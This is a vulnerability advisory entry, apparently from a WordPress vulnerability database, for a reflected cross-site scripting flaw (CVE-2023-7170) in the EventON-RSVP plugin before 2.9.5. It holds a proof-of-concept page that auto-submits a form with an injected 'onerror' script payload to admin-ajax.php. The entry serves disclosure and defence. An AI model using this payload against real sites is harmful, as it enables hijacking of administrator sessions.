Lucene search
KauenavarroWPEX-ID:218FB3AF-3A40-486F-8EA9-80211A986FB3HistoryDec 29, 2023 - 12:00 a.m.
EventON-RSVP < 2.9.5 - Reflected XSS
2023-12-2900:00:00
kauenavarro
38
eventon-rsvp
reflected xss
logged in admin
cross-site scripting
security vulnerability
form injection
code execution
Description The plugin does not sanitise and escape some parameters before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin
Make a logged in admin open a page containing the code below
<html>
<body onload="document.forms[0].submit()">
<form action="https://example.com/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="action" value="evors_get_rsvp_form" />
<input type="hidden" name="e_id" value="1" />
<input type="hidden" name="formtype" value="update'><img src onerror=alert(`XSS`)>"/>
<input type="submit" value="Submit request" />
</form>
</body>
</html>Related
prion
prion
Cross site scripting
2024-01-22 20:15:00
cvelist
cvelist
CVE-2023-7170 EventON-RSVP < 2.9.5 - Reflected XSS
2024-01-22 19:14:23
nvd
nvd
CVE-2023-7170
2024-01-22 20:15:47
wpvulndb
wpvulndb
EventON-RSVP < 2.9.5 - Reflected XSS
2023-12-29 00:00:00
cve
cve
CVE-2023-7170
2024-01-22 20:15:47
6 Medium
AI Score
Confidence
High
0.0005 Low
EPSS
Percentile
17.1%
Related for WPEX-ID:218FB3AF-3A40-486F-8EA9-80211A986FB3